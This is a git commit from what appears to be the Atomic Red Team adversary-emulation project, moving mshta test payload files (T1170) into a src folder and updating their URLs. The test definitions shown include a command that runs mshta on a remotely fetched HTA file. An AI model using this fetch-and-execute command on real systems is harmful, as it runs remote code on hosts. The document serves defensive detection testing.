moving recently added source files to /src per project spec (#783)

* updates paths to files

* moving T1170.hta to the source directory

* moving mshta.sct to the /src directory

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
JB
2020-01-18 12:47:37 -06:00
committed by Carrie Roberts
parent f0579aa1e7
commit b4ded762d4
3 changed files with 4 additions and 4 deletions
+3 -3
View File
@@ -12,7 +12,7 @@ atomic_tests:
file_url:
description: location of the payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/mshta.sct
executor:
name: command_prompt
elevation_required: false
@@ -58,8 +58,8 @@ atomic_tests:
hta_url:
description: URL to HTA file for execution
type: string
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/T1170.hta
executor:
name: command_prompt
command: |
mshta #{hta_url}
mshta #{hta_url}
@@ -9,4 +9,4 @@
<body>
<script>self.close();</script>
</body>
</html>
</html>